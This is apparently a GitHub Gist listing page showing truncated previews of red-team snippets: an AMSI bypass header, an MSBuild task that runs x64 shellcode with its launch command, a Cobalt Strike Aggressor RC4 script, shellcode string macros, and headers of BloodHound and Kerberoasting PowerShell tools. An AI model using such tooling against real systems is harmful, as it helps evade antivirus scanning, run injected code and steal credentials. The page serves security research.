Skip to content

Instantly share code, notes, and snippets.

CCob / patchless_amsi.h
Created Apr 17, 2022
In-Process Patchless AMSI Bypass
View patchless_amsi.h
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
CCob / execute_x64_shellcode.xml
Last active May 19, 2021
Execute x64 Shellcode
View execute_x64_shellcode.xml
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes x64 shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
CCob / rc4.cna
Created Jan 28, 2021
Aggressor Script for RC4 encryption
View rc4.cna
#RC4 encryption implementation using Java Crypto API
#Author: @_EthicalChaos_
import javax.crypto.spec.*;
import javax.crypto.*;
# $1 = plaintext, $2 = key
sub encryptRC4{
CCob / x86_relative_shellcode_strings.c
Last active May 11, 2022
x86 Relative String Addressing Hack
View x86_relative_shellcode_strings.c
#include <stdio.h>
#ifdef _WIN64
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x48\x83\xc0\x06\xc3" str;
#elif _WIN32
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str;
View IBH.txt
This file has been truncated, but you can view the full file.
function Invoke-BH{
$CollectionMethod = [string[]] @('Default'),
View IKR.txt
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
Note: the primary method of use will be Invoke-Kerberoast with
various targeting options.